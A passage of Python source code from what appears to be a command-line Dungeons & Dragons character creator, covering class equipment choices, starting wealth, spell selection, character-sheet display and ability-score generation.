index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n tuple(packs['PRIEST']),\n tuple(packs['EXPLORER'])\n ],\n [\n index['EQUIPMENT']['ADVENTURING GEAR']['HOLY SYMBOL']\n ]\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Cleric(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[shield],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'DRUID':\n equipment_options = [\n [\n shield,\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n scimitar,\n index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']\n ],\n [\n index['EQUIPMENT']['ADVENTURING GEAR']['DRUIDIC FOCUS']\n ]\n ]\n wealth_dice = Dice(number=2, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Druid(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[leather_armor, packs['EXPLORER']],\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'FIGHTER':\n equipment_options = [\n [\n [\n chain_mail_armor\n ],\n (\n leather_armor,\n longbow\n )\n ],\n [\n index['EQUIPMENT']['WEAPON']['MARTIAL']\n ],\n [\n shield,\n index['EQUIPMENT']['WEAPON']['MARTIAL'],\n ],\n [\n (\n handaxe,\n handaxe\n ),\n [\n light_crossbow\n ]\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ]\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Fighter(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n starting_wealth=starting_wealth\n )\n\n elif classe == 'MONK':\n equipment_options = [\n [\n shortsword,\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n chosen_equipment = [\n dart, dart, dart, dart, dart, dart, dart, dart, dart, dart\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Monk(\n level=level,\n equipment_options=equipment_options,\n equipment=chosen_equipment,\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'PALADIN':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['MARTIAL']\n ],\n [\n shield,\n index['EQUIPMENT']['WEAPON']['MARTIAL']\n ],\n [\n (\n javelin,\n javelin,\n javelin,\n javelin,\n javelin\n ),\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']\n ]\n ],\n [\n tuple(packs['PRIEST']),\n tuple(packs['EXPLORER'])\n ],\n [\n index['EQUIPMENT']['ADVENTURING GEAR']['HOLY SYMBOL']\n ]\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Paladin(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[chain_mail_armor],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'RANGER':\n print('Choose two simple melee weapons to be offered to you later:')\n equipment_options = [\n [\n scale_mail_armor,\n leather_armor\n ],\n [\n (\n shortsword,\n shortsword\n ),\n (\n choose_equipment(\n [[index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']]]\n )[0],\n choose_equipment(\n [[index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']]]\n )[0],\n )\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Ranger(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[longbow],\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'ROGUE':\n equipment_options = [\n [\n rapier,\n shortsword\n ],\n [\n shortbow,\n shortsword\n ],\n [\n tuple(packs['BURGLAR']),\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n chosen_equipment = [\n leather_armor,\n dagger,\n dagger,\n thieves_kit\n ]\n wealth_dice = Dice(number=4, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Rogue(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=chosen_equipment,\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'SORCERER':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n component_pouch,\n index['EQUIPMENT']['ADVENTURING GEAR']['ARCANE FOCUS']\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n wealth_dice = Dice(number=3, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Sorcerer(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[dagger, dagger],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'WARLOCK':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n component_pouch,\n index['EQUIPMENT']['ADVENTURING GEAR']['ARCANE FOCUS']\n ],\n [\n tuple(packs['SCHOLAR']),\n tuple(packs['DUNGEONEER'])\n ],\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n ]\n wealth_dice = Dice(number=4, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Warlock(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[leather_armor, dagger, dagger],\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'WIZARD':\n equipment_options = [\n [\n quarterstaff,\n dagger\n ],\n [\n component_pouch,\n index['EQUIPMENT']['ADVENTURING GEAR']['ARCANE FOCUS']\n ],\n [\n tuple(packs['SCHOLAR']),\n tuple(packs['EXPLORER'])\n ],\n ]\n wealth_dice = Dice(number=4, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Wizard(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[spellbook],\n starting_wealth=starting_wealth\n )\n\n classe.features = create_simple_list(classe.features)\n\n classe.equipment = create_simple_list(classe.equipment)\n classe.equipment = group_equipment(classe.equipment)\n\n return classe\n\n\ndef print_abilities(character):\n print(\n f'Abilities: '\n f'STR '\n f'DEX '\n f'CON '\n f'INT '\n f'WIS '\n f'CHA '\n )\n print(\n f' '\n f\"{character.abilities.values['STR']:02d} \"\n f\"({character.abilities.score('STR'):+}) \"\n f\"{character.abilities.values['DEX']:02d} \"\n f\"({character.abilities.score('DEX'):+}) \"\n f\"{character.abilities.values['CON']:02d} \"\n f\"({character.abilities.score('CON'):+}) \"\n f\"{character.abilities.values['INT']:02d} \"\n f\"({character.abilities.score('INT'):+}) \"\n f\"{character.abilities.values['WIS']:02d} \"\n f\"({character.abilities.score('WIS'):+}) \"\n f\"{character.abilities.values['CHA']:02d} \"\n f\"({character.abilities.score('CHA'):+}) \"\n )\n\n\ndef print_main_info(character):\n headline = '\\nLevel ' \\\n + 'Proficiency ' \\\n + 'AC ' \\\n + 'HP ' \\\n + 'Speed ' \\\n + 'Alignment ' \\\n + 'Initiative ' \\\n + 'Background'\n\n values = f'{character.general_info[\"LEVEL\"]:02d} ' \\\n + f'{character.proficiencies[\"VALUE\"]:02d} ' \\\n + f'{character.general_stats[\"AC\"]} ' \\\n + f'{character.general_stats[\"CURRENT HP\"]:03d} ' \\\n + f'{character.general_stats[\"SPEED\"]} ' \\\n + f'{character.general_info[\"ALIGNMENT\"].title():15s} ' \\\n + f'{character.general_stats[\"INITIATIVE\"]} ' \\\n + f'{character.general_info[\"BACKGROUND\"].title()}'\n\n print(headline)\n print(values)\n\n\ndef show_character_info(character):\n clear_terminal()\n\n print_name(\n name=character.personal_info[\"CHARACTER'S NAME\"].title(),\n category=f'{character.general_info[\"RACE\"].title()} '\n + f'{character.general_info[\"CLASS\"].title()}'\n )\n print_abilities(character)\n print_main_info(character)\n print('')\n\n\ndef select_cantrips(character):\n cantrips_to_select = character.magical_ability.cantrips_known \\\n - len(character.magical_ability.cantrips)\n possible_cantrips = index['CANTRIPS'][character.general_info['CLASS']]. \\\n copy()\n\n for cantrip in character.magical_ability.cantrips:\n possible_cantrips.remove(cantrip)\n\n clear_terminal()\n print(\n f'As a {character.general_info[\"CLASS\"]}, you have '\n f'{cantrips_to_select} cantrips to select:\\n'\n )\n\n cantrips = select(\n options=possible_cantrips,\n quantity=cantrips_to_select,\n prompt='You have cantrips to select.',\n )\n\n return cantrips\n\n\ndef select_spells(character):\n added_spells = []\n for level, spells in character.magical_ability.spells.items():\n added_spells += spells\n\n spells_to_select = character.magical_ability.spells_known - len(\n added_spells)\n\n all_spells = {}\n class_spells_by_level = index['SPELLS'][character.general_info['CLASS']]\n\n max_spell_slot = None\n for level, slots in character.magical_ability.spell_slots.items():\n if slots > 0:\n max_spell_slot = level\n\n for level, spells in class_spells_by_level.items():\n if level <= max_spell_slot:\n for spell in spells:\n if spell not in added_spells:\n all_spells[spell] = level\n\n clear_terminal()\n print(\n f'As a {character.general_info[\"CLASS\"]}, you have '\n f'{spells_to_select} spells up to level {max_spell_slot} to select:\\n'\n )\n all_spells_list = list(all_spells.keys())\n spells_list = select(\n options=all_spells_list,\n quantity=spells_to_select,\n prompt='You have spells to select.',\n )\n\n if spells_list not in [['EXIT'], ['GO BACK']]:\n spells = {}\n for level in range(1, max_spell_slot + 1):\n if level not in spells:\n spells[level] = []\n\n spells_list += added_spells\n for spell in spells_list:\n spells[all_spells[spell]].append(spell)\n else:\n spells = spells_list[0]\n\n return spells\n\n\ndef prepare_spells(character, finish=True):\n magical_ability = character.magical_ability\n\n if magical_ability.has_magic is None:\n return None\n\n if magical_ability.prepare_spells is not True:\n return None\n\n spells_to_prepare = []\n if magical_ability.spells_known == -1:\n for lvl, spells in index['SPELLS'][magical_ability.spell_list].items():\n if magical_ability.spell_slots[lvl] > 0:\n spells_to_prepare += spells\n\n elif magical_ability.spells_known > 0:\n for level, spells in magical_ability.spells.items():\n spells_to_prepare += spells\n\n if len(spells_to_prepare) == 0:\n return None\n\n prepared_spells = select(\n options=spells_to_prepare,\n quantity=magical_ability.number_prepared_spells,\n prompt='Select the spells that you are gonna have prepared.',\n single_item=True,\n go_back=False,\n finish=finish,\n )\n\n if prepared_spells in ['GO BACK', 'EXIT']:\n return prepared_spells\n\n list_prepared_spells = prepared_spells.copy()\n dict_prepared_spells = {}\n for spell in list_prepared_spells:\n for lvl, spells in index['SPELLS'][magical_ability.spell_list].items():\n if spell in spells:\n try:\n dict_prepared_spells[lvl].append(spell)\n except KeyError:\n dict_prepared_spells[lvl] = [spell]\n\n prepared_spells = dict_prepared_spells\n character.magical_ability.prepared_spells = prepared_spells\n\n return None\n\n\ndef get_dict_with_units(original):\n return_dict = {}\n\n for equipment in original:\n if equipment in return_dict:\n return_dict[equipment] += 1\n else:\n return_dict[equipment] = 1\n\n return return_dict\n\n\ndef check_spells(character):\n if len(character.magical_ability.cantrips) \\\n < character.magical_ability.cantrips_known:\n new_cantrips = select_cantrips(character)\n\n if new_cantrips not in ['EXIT', 'GO BACK']:\n character.magical_ability.set_cantrips(new_cantrips)\n save_sheet(character)\n\n elif new_cantrips == 'EXIT':\n return 'EXIT'\n\n elif character.magical_ability.cantrips_known == -1:\n character.magical_ability.set_cantrips([])\n\n spells_list = []\n for spells in character.magical_ability.spells.values():\n spells_list += spells\n\n if len(spells_list) < character.magical_ability.spells_known:\n new_spells = select_spells(character)\n\n if new_spells not in ['EXIT', 'GO BACK']:\n character.magical_ability.set_spells(new_spells)\n save_sheet(character)\n elif new_spells == 'EXIT':\n return 'EXIT'\n\n if character.magical_ability.prepare_spells:\n if len(character.magical_ability.prepared_spells) == 0:\n result = prepare_spells(character)\n if result in ['EXIT']:\n return result\n else:\n save_sheet(character)\n\n return None\n\n\ndef print_spells(spells_dict):\n max_spell_showed = 0\n\n for level, spells in spells_dict.items():\n max_spell_showed = level\n ordinal = get_ordinal(level)\n\n print_name(f'{level}{ordinal} level spells')\n print('')\n for spell in spells:\n print(f'- {spell.title()}')\n print('')\n\n return max_spell_showed\n\n\ndef show_spells(character, enter_continue=True, show_empty=True):\n magical_ability = character.magical_ability\n\n print_name('Cantrips')\n print('')\n if len(magical_ability.cantrips) == 0:\n print('No cantrip to show here!')\n else:\n for cantrip in magical_ability.cantrips:\n print(f'- {cantrip.title()}')\n print('')\n\n max_spell_showed = 0\n if magical_ability.prepare_spells:\n if len(magical_ability.prepared_spells) > 0:\n max_spell_showed = print_spells(magical_ability.prepared_spells)\n else:\n if len(magical_ability.spells) > 0:\n max_spell_showed = print_spells(magical_ability.spells)\n\n if show_empty:\n for level in range(\n max_spell_showed + 1,\n magical_ability.highest_spell_level + 1\n ):\n ordinal = get_ordinal(level)\n\n print_name(f'{level}{ordinal} level spells')\n print('')\n print('No spell to show here!')\n print('')\n\n if enter_continue:\n print('')\n print('Press ENTER to continue')\n input()\n\n\ndef show_character(character):\n answer = None\n while answer != 'GO BACK':\n show_character_info(character)\n\n what_to_see = [\n 'SAVING THROWS',\n 'SKILLS',\n 'LANGUAGES',\n 'PROFICIENCY IN EQUIPMENTS',\n 'EQUIPMENT',\n 'FEATURES',\n 'PERSONAL INFO',\n 'SPELLS',\n ]\n\n answer = select(\n options=what_to_see,\n single_item=True,\n clean=False,\n finish=False,\n )\n\n if answer == 'SAVING THROWS':\n show_character_info(character)\n\n for ability in index['ABILITIES']:\n total = character.abilities.score(ability)\n if ability in character.proficiencies[\"SAVING THROWS\"]:\n saving_throw = f'+ {character.proficiencies[\"VALUE\"]} '\n total += character.proficiencies[\"VALUE\"]\n else:\n saving_throw = ' '\n\n print(\n f'{ability.title()}: '\n f'{character.abilities.score(ability):02d} '\n f'{saving_throw} '\n f'= {total:02d}'\n )\n\n print(\"\\nPress ENTER to continue\")\n input()\n\n elif answer == 'SKILLS':\n show_character_info(character)\n\n for skill, ability in index['SKILLS'].items():\n total = character.abilities.score(ability)\n\n if skill in character.proficiencies[\"SKILLS\"]:\n proficiency = f'+ {character.proficiencies[\"VALUE\"]} '\n total += character.proficiencies[\"VALUE\"]\n else:\n proficiency = ' '\n\n name = f'{skill.title()} ({ability})'\n\n print(\n f'{name:25s}: '\n f'{character.abilities.score(ability):02d} '\n f'{proficiency}'\n f'= {total:3d}'\n )\n\n print('\\nPress ENTER to continue')\n input()\n\n elif answer == 'LANGUAGES':\n show_character_info(character)\n\n character.languages = create_simple_list(character.languages)\n\n print('Languages spoken:')\n for language in character.languages:\n print(f'- {language.title()};')\n\n print('\\nPress ENTER to continue')\n input()\n\n elif answer == 'PROFICIENCY IN EQUIPMENTS':\n show_character_info(character)\n print('You have proficiency in the following equipment:')\n\n print('\\nArmors:')\n if len(character.proficiencies[\"ARMORS\"]) == 0:\n print('- No armor.')\n else:\n for armor in character.proficiencies[\"ARMORS\"]:\n print(f'- {armor.title()}')\n\n print('\\nWeapons:')\n if len(character.proficiencies[\"WEAPONS\"]) == 0:\n print('- No weapon.')\n else:\n for weapon in character.proficiencies[\"WEAPONS\"]:\n print(f'- {weapon.title()}')\n\n print('\\nTools:')\n if len(character.proficiencies[\"TOOLS\"]) == 0:\n print('- No tool.')\n else:\n for tool in character.proficiencies[\"TOOLS\"]:\n print(f'- {tool.title()}')\n\n print('\\nPress ENTER to continue')\n input()\n\n elif answer == 'EQUIPMENT':\n armors = get_dict_with_units(character.equipments['ARMORS'])\n weapons = get_dict_with_units(character.equipments['WEAPONS'])\n gears = get_dict_with_units(character.equipments[\n 'ADVENTURING GEARS'])\n tools = get_dict_with_units(character.equipments['TOOLS'])\n mounts = get_dict_with_units(character.equipments[\n 'MOUNTS AND VEHICLES'])\n trinkets = get_dict_with_units(character.equipments['TRINKETS'])\n\n show_character_info(character)\n\n if armors:\n print_name('Armors')\n print(\n 'Name Armor Class Weight '\n + 'Dex Max Strength Units'\n )\n for armor, units in armors.items():\n if armor.strength is False:\n strength = str(0)\n else:\n strength = str(armor.strength)\n\n if armor.dex_max is False:\n dex_max = str(armor.dex_max)\n else:\n dex_max = f' {armor.dex_max} '\n\n print(\n f'{armor.name.title():24s}'\n f'{str(armor.armor_class):12s}'\n f'{str(armor.weight):10s}'\n f'{dex_max:13s}'\n f'{strength:17s}'\n f'{units}'\n )\n print('\\n')\n\n if weapons:\n print_name('Weapons')\n print(\n 'Name Damage '\n 'Damage Type Weight Units'\n )\n for weapon, units in weapons.items():\n name = f'{weapon.name.title():19s}'\n damage = f'{convert_dice_to_d_format(weapon.damage):9s}'\n damage_type = f'{weapon.damage_type:30s}'\n weight = f'{weapon.weight} lb.'\n weight = f'{weight:18s}'\n print(name + damage + damage_type + weight + str(units))\n print('\\n')\n\n if gears:\n print_name('Adventuring Gears')\n print('Name' + ' ' * 50 + 'Weight (lb.)' + ' ' * 8 + 'Units')\n for gear, units in gears.items():\n print(\n f'{gear.name.title():59s}'\n f'{str(gear.weight):17s}'\n f'{units}'\n )\n print('\\n')\n\n if tools:\n print_name('Tools')\n print('Name' + ' ' * 50 + 'Weight (lb.)' + ' ' * 8 + 'Units')\n for tool, units in tools.items():\n print(\n f'{tool.name.title():59s}'\n f'{str(tool.weight):17s}'\n f'{units}'\n )\n print('\\n')\n\n if mounts:\n print_name('Mounts and Vehicles')\n for mount in mounts:\n print(f'- {mount.name.title()}')\n print('\\n')\n\n if trinkets:\n print_name('Trinkets')\n for trinket in trinkets:\n print(f'- {trinket.name.title()}')\n print('\\n')\n\n print_name('WEIGHT')\n print(f'Total weight carried: {character.equipments[\"WEIGHT\"]}')\n if character.equipments['WEIGHT'] \\\n > character.abilities.values['STR'] * 15:\n print('You are carrying way too much. Keep it easy, man!')\n else:\n print('You are carrying just fine!')\n print('')\n\n print_name()\n print('Press ENTER to continue')\n input()\n\n elif answer == 'FEATURES':\n show_character_info(character)\n\n print_name('Racial Features')\n if character.features['RACE']:\n for feature in character.features['RACE']:\n print(f'- {feature.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Class Features')\n if character.features['CLASS']:\n for feature in character.features[\"CLASS\"]:\n print(f'- {feature.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Background Feature')\n if character.features['BACKGROUND']:\n for feature in character.features[\"BACKGROUND\"]:\n print(f'- {feature.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Advantages')\n if character.features['ADVANTAGES']:\n for advantage in character.features['ADVANTAGES']:\n print(f'- {advantage.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Disadvantages')\n if character.features['DISADVANTAGES']:\n for disadvantages in character.features['DISADVANTAGES']:\n print(f'- {disadvantages.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Resistances')\n if character.features['RESISTANCES']:\n for resistance in character.features['RESISTANCES']:\n print(f'- {resistance.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print('Press ENTER to continue.')\n input()\n\n elif answer == 'PERSONAL INFO':\n show_character_info(character)\n\n print_name('Physical appearance')\n print(\n 'Age Eye Color Skin Color '\n 'Hair Color Height Weight'\n )\n print(\n f'{set_string_size(character.personal_info[\"AGE\"], 9)}'\n f'{set_string_size(character.personal_info[\"EYE\"], 15)}'\n f'{set_string_size(character.personal_info[\"SKIN\"], 16)}'\n f'{set_string_size(character.personal_info[\"HAIR\"], 16)}'\n f'{set_string_size(character.personal_info[\"HEIGHT\"], 12)}'\n f'{set_string_size(character.personal_info[\"WEIGHT\"], 12)}'\n f'\\n'\n )\n\n backgrounds_speciality = {\n 'CHARLATAN': 'FAVORITE SCHEME',\n 'CRIMINAL': 'CRIMINAL SPECIALITY',\n 'SPY': 'CRIMINAL SPECIALITY',\n 'ENTERTAINER': 'ENTERTAINER ROUTINES',\n 'GLADIATOR': 'ENTERTAINER ROUTINES',\n 'FOLK HERO': 'DEFINING EVENT',\n 'GUILD ARTISAN': 'GUILD BUSINESS',\n 'GUILD MERCHANT': 'GUILD BUSINESS',\n 'HERMIT': 'LIFE OF SECLUSION',\n 'OUTLANDER': 'ORIGIN',\n 'SAGE': 'SPECIALTY',\n 'SOLDIER': 'SPECIALTY',\n }\n\n print_name(\"Psychological traits\")\n if character.general_info['BACKGROUND'] in backgrounds_speciality:\n background_speciality = \\\n backgrounds_speciality[character.general_info['BACKGROUND']]\n\n print(\n f'{background_speciality.title()}: '\n f'{character.psychology[\"BACKGROUND SPECIALITY\"]}'\n f'\\n'\n )\n\n print(\n f'Personality trait: '\n f'{character.psychology[\"PERSONALITY TRAIT\"]}\\n'\n )\n print(f'Ideal: {character.psychology[\"IDEAL\"]}\\n')\n print(f'Bond: {character.psychology[\"BOND\"]}\\n')\n print(f'Flaw: {character.psychology[\"FLAW\"]}\\n')\n\n print_name('History')\n print('')\n for line in character.personal_info['HISTORY']:\n print(line)\n\n print('')\n print('Press ENTER to continue')\n input()\n\n elif answer == 'SPELLS':\n if character.magical_ability.has_magic:\n result = check_spells(character)\n if result is None:\n show_character_info(character)\n show_spells(character)\n elif result == 'EXIT':\n return result\n else:\n show_character_info(character)\n print('It appears that your character has no coward magic!')\n print('Go out there and smash their heads!')\n print('Press ENTER to continue')\n input()\n\n clear_terminal()\n\n\ndef get_history():\n clear_terminal()\n print(\"What is your character's history?\")\n\n history = []\n new_paragraph = None\n while new_paragraph != '':\n new_paragraph = input()\n history.append(new_paragraph)\n\n return history[:-1]\n\n\ndef get_player_name():\n name = input('What is your name? ')\n clear_terminal()\n\n return name\n\n\ndef get_name():\n confirmed = False\n name = ''\n\n while not confirmed:\n name = input(\"What is your character's name? \")\n\n print(f'\\nYou typed: {name}.')\n\n valid_answer = False\n while not valid_answer:\n confirmation = input('Do you confirm it? YES or NO? ')\n confirmation = confirmation.upper()\n\n if confirmation == 'YES' or confirmation == 'Y':\n valid_answer = True\n confirmed = True\n elif confirmation == 'NO' or confirmation == 'N':\n valid_answer = True\n else:\n print('\\nPlease, type only YES or NO')\n\n clear_terminal()\n\n return name.upper()\n\n\ndef get_age(race):\n prompt = \\\n f\"Typically, a {race.name} has between {race.age[0]} and \" \\\n f\"{race.age[1]} years old in the adult phase.\\n\" \\\n \"What is your character's age?\"\n age = get_a_number(prompt=prompt, go_back_message=False)\n age = str(age)\n\n return age\n\n\ndef get_height(race):\n text = f'Typically, a {race.name} has between {race.height[0]}\\' and ' \\\n f'{race.height[1]}\\' of height.\\n' \\\n f'What is your character\\'s height?'\n height = get_a_number(prompt=text, go_back_message=False)\n height = str(height)\n\n return height\n\n\ndef get_weight():\n weight = get_a_number(\n prompt=\"What is your character's weight?\",\n go_back_message=False)\n weight = str(weight)\n\n return weight\n\n\ndef get_eye_color():\n clear_terminal()\n eye = input('What is your character\\'s eye color?\\n')\n return eye\n\n\ndef get_skin_color():\n clear_terminal()\n skin = input('What is your character\\'s skin color?\\n')\n return skin\n\n\ndef get_hair_color():\n clear_terminal()\n hair = input('What is your character\\'s hair color?\\n')\n return hair\n\n\ndef get_personal_info(race):\n \"\"\"\n Asks for the user irrelevant data about the character\n :return: Dict with all data gathered in the function\n \"\"\"\n player_name = get_player_name()\n character_name = get_name()\n age = get_age(race)\n height = get_height(race)\n weight = get_weight()\n eyes_color = get_eye_color()\n skin_color = get_skin_color()\n hair_color = get_hair_color()\n history = get_history()\n\n personal_info = {\n \"PLAYER'S NAME\": player_name,\n \"CHARACTER'S NAME\": character_name,\n \"AGE\": age,\n \"HEIGHT\": height,\n \"WEIGHT\": weight,\n \"EYE\": eyes_color,\n \"SKIN\": skin_color,\n \"HAIR\": hair_color,\n \"HISTORY\": history\n }\n\n return personal_info\n\n\ndef generate_random_values():\n \"\"\"\n Generates the random values of the abilities and asks for the player\n to which places they shall be assigned\n :return: list: all the random values\n \"\"\"\n die = Dice(1, 6) # Creates a d6\n\n def correct_values(values):\n \"\"\"\n Checks the values for the conditions that states them as correct\n :param values: The list with the 6 values generated randomly\n :return: bool: If the values are correct or not\n \"\"\"\n if not values:\n return False\n else:\n modifiers = [] # A list with all the modifiers from the abilities\n biggest_value = 0\n\n for number in values:\n modifier = floor((number - 10) / 2)\n modifiers.append(modifier)\n\n if number > biggest_value:\n biggest_value = number\n\n # If the sum of modifiers is minus than 3, the values must be redone\n if sum(modifiers) < 3:\n return False\n else:\n return True\n\n scores = []\n while not correct_values(scores):\n scores = []\n\n for _ in range(1, 7):\n dice = []\n\n for _ in range(1, 5):\n # Roll the dice to generate the random value from 1 to 6\n value = die.roll(0)\n dice.append(value)\n\n # Removes from the list the die with the lesser value\n dice.sort()\n dice.pop(0)\n\n scores.append(sum(dice)) # Store the sum of the 3 dice\n\n return scores\n\n\ndef show_major_abilities(classe):\n \"\"\"\n Every class has its most important abilities. This function prints the ones\n listed in the Player's Handbook, so the user do a better choice.\n :param classe: String representing the class chosen by user\n \"\"\"\n abilities = []\n\n if isinstance(classe, Class):\n classe = classe.name\n\n if classe == 'BARBARIAN':\n abilities = [['STR'], ['CON']]\n elif classe == 'BARD':\n abilities = [['CHA'], ['DEX']]\n elif classe == 'CLERIC':\n abilities = [['WIS'], ['STR', 'CON']]\n elif classe == 'DRUID':\n abilities = [['WIS'], ['CON']]\n elif classe == 'FIGHTER':\n abilities = [['STR', 'DEX'], ['CON', 'INT']]\n elif classe == 'MONK':\n abilities = [['DEX'], ['WIS']]\n elif classe == 'PALADIN':\n abilities = [['STR'], ['CHA']]\n elif classe == 'RANGER':\n abilities = [['DEX'], ['WIS']]\n elif classe == 'ROGUE':\n abilities = [['DEX'], ['INT', 'CHA']]\n elif classe == 'SORCERER':\n abilities = [['CHA'], ['CON']]\n elif classe == 'WARLOCK':\n abilities = [['CHA'], ['CON']]\n elif classe == 'WIZARD':\n abilities = [['INT'], ['CON', 'DEX', 'CHA']]\n\n print(f'For major ability, the recommendation is/are:')\n for ability in abilities[0]:\n print(f'- {ability}')\n print('')\n\n print(f'For the second major ability, the recommendation is/are:')\n for ability in abilities[1]:\n print(f'- {ability}')\n print('')\n\n\ndef get_abilities_values(values, classe):\n \"\"\"\n Allows the user to assign the desired values of its abilities.\n :param values: A list of the values generated for the user.\n :param classe: String with the name of the class selected by the user\n :return: Dictionary containing the values sorted by the user\n \"\"\"\n\n abilities = {\n 'STR': 'Strength',\n 'DEX': 'Dexterity',\n 'CON': 'Constitution',\n 'INT': 'Intelligence',\n 'WIS': 'Wisdom',\n 'CHA': 'Charisma'\n }\n new_values = {}\n\n for ability_short, ability_name in abilities.items():\n end = False\n while not end:\n print(f'Your abilities scores are: {values}')\n print('Choose wisely!\\n')\n\n show_major_abilities(classe)\n\n if new_values:\n for ability, value in new_values.items():\n print(\n f'Insert the value of {abilities[ability].title()}: '\n f'{value}'\n )\n\n value = input(f'Insert the value of {ability_name.title()}: ')\n if value.isnumeric():\n value = int(value)\n\n if value in values:\n values.remove(value)\n new_values[ability_short] = value\n end = True\n else:\n clear_terminal()\n print(\n 'This value is not in your random values. '\n 'Please try again'\n )\n else:\n clear_terminal()\n print(\n \"Your answer doesn't look like a number. \"\n 'Please try again'\n )\n\n clear_terminal()\n\n return new_values\n\n\ndef buy_points(classe):\n clear_terminal()\n\n total_points = 27\n points_spent = 0\n values = {\n 'STR': 8,\n 'DEX': 8,\n 'CON': 8,\n 'INT': 8,\n 'WIS': 8,\n 'CHA': 8\n }\n\n confirmed = False\n while not confirmed:\n left_points = total_points - points_spent\n\n options = {\n f'Strength: {values[\"STR\"]}': 'STR',\n f'Dexterity: {values[\"DEX\"]}': 'DEX',\n f'Constitution: {values[\"CON\"]}': 'CON',\n f'Intelligence: {values[\"INT\"]}': 'INT',\n f'Wisdom: {values[\"WIS\"]}': 